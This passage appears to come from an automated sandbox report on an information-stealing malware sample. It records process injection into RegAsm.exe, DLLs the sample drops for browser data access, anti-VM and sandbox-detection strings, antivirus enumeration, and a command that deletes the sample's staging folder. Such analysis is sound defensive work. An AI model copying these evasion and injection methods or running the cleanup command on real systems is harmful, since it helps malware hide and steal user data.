                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.3.dr, vcruntime140[1].dll.3.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.3.dr, msvcp140.dll.3.dr
                  Source: Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
                  Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.3.dr
                  Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
                  Source: Binary string: softokn3.pdb source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00417645 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                  Source: softokn3.dll.3.drStatic PE information: section name: .00cfg
                  Source: softokn3[1].dll.3.drStatic PE information: section name: .00cfg
                  Source: freebl3.dll.3.drStatic PE information: section name: .00cfg
                  Source: freebl3[1].dll.3.drStatic PE information: section name: .00cfg
                  Source: mozglue.dll.3.drStatic PE information: section name: .00cfg
                  Source: mozglue[1].dll.3.drStatic PE information: section name: .00cfg
                  Source: msvcp140.dll.3.drStatic PE information: section name: .didat
                  Source: msvcp140[1].dll.3.drStatic PE information: section name: .didat
                  Source: sqlx[1].dll.3.drStatic PE information: section name: .00cfg
                  Source: nss3.dll.3.drStatic PE information: section name: .00cfg
                  Source: nss3[1].dll.3.drStatic PE information: section name: .00cfg
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E7534 push ecx; ret
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004191D5 push ecx; ret
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6FB536 push ecx; ret
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\GHIJJEGDBFII\nss3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\GHIJJEGDBFII\freebl3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\GHIJJEGDBFII\vcruntime140.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\GHIJJEGDBFII\softokn3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\GHIJJEGDBFII\msvcp140.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\GHIJJEGDBFII\mozglue.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\GHIJJEGDBFII\nss3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\GHIJJEGDBFII\freebl3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\GHIJJEGDBFII\vcruntime140.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\GHIJJEGDBFII\softokn3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\GHIJJEGDBFII\msvcp140.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\GHIJJEGDBFII\mozglue.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00417645 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5984, type: MEMORYSTR
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: RegAsm.exeBinary or memory string: DIR_WATCH.DLL
                  Source: RegAsm.exeBinary or memory string: SBIEDLL.DLL
                  Source: RegAsm.exeBinary or memory string: API_LOG.DLL
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\GHIJJEGDBFII\nss3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\GHIJJEGDBFII\freebl3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\GHIJJEGDBFII\softokn3.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 6.2 %
                  Source: C:\Windows\SysWOW64\timeout.exe TID: 2576Thread sleep count: 88 > 30
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040FCE5 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 0040FDF8h
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F81B2 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004162AF _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004153F6 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040B463 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004094E5 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040C679 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00415AC2 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00409F72 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00409900 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040A981 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00415E66 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00415843 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040FE81 GetSystemInfo,wsprintfA,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                  Source: RegAsm.exe, 00000003.00000002.2040315374.0000000003465000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E7B35 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00417645 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F2E07 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F0040 mov ecx, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F2E4B mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FB84A GetProcessHeap,
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E7810 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E7B35 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E7C91 SetUnhandledExceptionFilter,
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006EC606 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041937F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041E438 SetUnhandledExceptionFilter,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041A8A7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6FB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6FB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8AAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Yara detected Powershell download and execute
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 6856, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5984, type: MEMORYSTR
                  Allocates memory in foreign processes
                  Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                  Contains functionality to inject code into remote processes
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02CD018D CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                  Searches for specific processes (likely to inject)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004111BE _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 422000
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42E000
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 641000
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BF6008
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GHIJJEGDBFII" & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8F4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E7630 cpuid
                  Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,
                  Source: C:\Users\user\Desktop\file.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                  Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,
                  Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,
                  Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _EH_prolog,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E7A2F GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040FBCB GetProcessHeap,HeapAlloc,GetUserNameA,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040FC92 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
